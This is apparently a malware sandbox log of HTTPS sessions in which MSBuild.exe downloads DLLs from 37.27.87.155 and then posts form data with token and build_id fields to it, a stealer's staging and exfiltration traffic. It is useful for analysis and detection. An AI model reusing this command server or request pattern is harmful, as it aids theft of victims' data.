                                                                                                                                                                                                                                                                          2024-04-20 12:28:30 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          15192.168.2.44975237.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:31 UTC157OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                                                          Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                                                          Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                                                          Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                                          Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                                          Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                                          Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                                          Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                                          Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                                          2024-04-20 12:28:32 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                                          Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.44975337.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:33 UTC161OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:33 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                                                          Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                                                          Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                                                          Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                                                          2024-04-20 12:28:34 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                                                          Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.44975437.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:35 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 1145
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:35 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:36 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.44975537.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:36 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
